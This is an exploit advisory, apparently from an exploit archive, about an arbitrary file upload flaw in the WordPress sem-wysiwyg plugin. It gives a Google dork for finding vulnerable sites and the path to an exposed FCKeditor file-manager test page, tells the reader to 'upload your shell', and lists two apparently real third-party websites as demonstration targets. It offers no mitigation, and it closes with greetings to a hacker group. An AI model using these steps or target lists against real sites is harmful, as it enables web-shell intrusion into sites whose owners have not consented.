id: 20233
date: 01/26/2013
title: Wordpress sem WYSIWYG Arbitrary File Upload Vulnerability
author: fayzoun
cves: 

# Exploit Title: Wordpress sem WYSIWYG Arbitrary File Upload Vulnerability
# Author: fayzoun
# facebook: https://www.facebook.com/fayzoun.AO
# Google Dork: inurl:wp-content/plugins/sem-wysiwyg/
# Tested on: win7
==================================
#Exploit:
http://localhost/path/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
upload your shell...
#D3m0:
http://www.anotherdailydose.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/connectors/test.html
http://embraceorerase.com/wp-content/plugins/sem-wysiwyg/fckeditor/editor/filemanager/upload/test.html
####################################################
Greetz to: Rebels - and tunisian hackerz ^_^

#  0day.today [2023-03-25]  #